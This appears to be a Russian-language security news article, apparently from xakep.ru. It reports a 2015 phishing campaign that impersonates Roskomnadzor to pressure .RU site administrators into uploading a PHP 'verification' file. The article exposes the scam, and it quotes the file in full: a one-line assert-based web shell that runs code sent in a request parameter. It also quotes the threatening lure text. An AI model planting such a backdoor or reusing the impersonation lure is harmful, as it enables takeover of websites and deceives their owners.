ФАЛЬШИВЫЙ РОСКОМНАДЗОР ПРОСИТ РАЗМЕСТИТЬ НА САЙТЕ ТРИ СТРОЧКИ PHP-КОДА

https://xakep.ru/wp-content/uploads/2015/08/00239-1000x667.jpg
В ночь с 26 на 27 августа 2015 года в рунете произошла массовая рассылка писем от имени Роскомнадзора в адрес администраторов доменных имен в зоне .RU (примеры: 1, 2, 3). Прикрываясь именем Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций, злоумышленники требуют от админов разместить на сервере «невинный» файл с названием reestr-id198617.php. Письма приходят с адреса zapret-info@roskomnadzor.org.

В письме сказано, что файл необходим «для идентификации Вас, как администратора доменного имени».

Массовая рассылка сделана явно на волне информационного шума о блокировке Википедии, которую попытался осуществить Роскомнадзор. Как известно, решением Черноярского районного суда Астраханской области информация на одной из страниц русскоязычной версии энциклопедии была признана противоправной и запрещенной к доступу на территории РФ. В статье содержится подробная информация о наркотическом веществе «чарас».

Поскольку Википедия использует протокол шифрования HTTPS, то заблокировать одну страницу провайдеры не могли, так что утром 26 августа 2015 года под блокировку попала вся энциклопедия.

Впрочем, блокировка продлилась недолго. Вскоре Роскомнадзор пошел на попятную и удалил Википедию из реестра, несмотря на то, что редакторы Википедии значительно расширили статью и дополнили ее новыми разделами, в том числе про употребление чараса. Однако история получила широкое освещение в СМИ и вызвала общественный резонанс, то есть в массовое сознание проникла схема «районный суд — Роскомнадзор — блокировка». Эту схему можно использовать в социальной инженерии.

По схожему сценарию, фальшивый Роскомнадзор в мошеннической рассылке ссылается на «решение Новокуйбышевского городского суда Самарской области от 11.08.2015 No 2­1618/2015».

https://xakep.ru/wp-content/uploads/2015/08/00317.png

От владельца сайта требуется создать в корневой директории папку reestr, там создать файл reestr-id198617.php, содержащий следующий текст:

[PHP]<?php
/*Подтверждение доменного имени ХХХХХ.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>[/PHP]
«Если в течении 72 часов с момента получения данного письма вы не идентифицируете себя, как администратор доменного имени ХХХХХ.ru, следуя инструкции, указанной выше, то ваш сайт ХХХХХ.ru будет внесен в черные списки интернет-провайдеров и заблокирован на территории Российской Федерации», — угрожают мошенники.

Функция assert выполняет вредоносные инструкции, указанные в переменой roskomnadzor.

Похоже, это первый случай, когда Роскомнадзор достиг такой степени известности, что от его имени проводят хакерские атаки, а в его честь сочиняют песни.